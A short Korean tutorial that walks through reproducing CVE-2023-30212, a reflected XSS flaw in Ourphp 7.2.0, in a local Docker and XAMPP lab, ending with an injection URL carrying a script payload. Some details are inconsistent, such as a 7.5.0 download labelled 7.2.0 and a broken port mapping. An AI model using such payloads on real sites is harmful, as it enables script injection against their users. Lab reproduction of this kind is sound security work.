
CVE-2023-30212에 대한 단계별 익스플로잇 가이드, Ourphp 7.2.0의 XSS 취약점, Docker 설정 및 페이로드 주입 데모 포함.
Ourphp 버전 7.2.0의 취약점 악용 (CVE 2023 30212)
1단계. 시스템에 Docker 다운로드 및 설치 (참고). 저는 Docker를 사용하는데, Ubuntu를 빠르고 쉽게 설치할 수 있기 때문입니다.
2단계. Docker 환경 설정
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash
3단계. 웹 서버, PHP 및 MySQL 설치. 이를 위해 XAMPP 서버를 설치하겠습니다.
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start
4단계. Ourphp 버전 7.2.0 다운로드
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775
5단계. 브라우저에서 Ourphp 설정 브라우저를 열고 localhost 또는 127.0.0.1을 입력하세요. 안내에 따라 Ourphp를 설치하세요.
6단계. 취약점 악용 Ourphp 7.2.0 버전에는 XSS(교차 사이트 스크립팅) 취약점이 있습니다. XSS 코드 실행을 허용하는 /client/manage/ourphp_out.php 파일의 취약점을 완화하려면
코드를 수정해야 합니다. 이 취약점은 "ourphp_admin" 매개변수가 "logout"으로 설정되고 제어 가능한 변수 "out"이 echo될 때 발생합니다.
공격자는 ""와 같은 페이로드를 주입하여 이를 악용할 수 있습니다.
코드: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
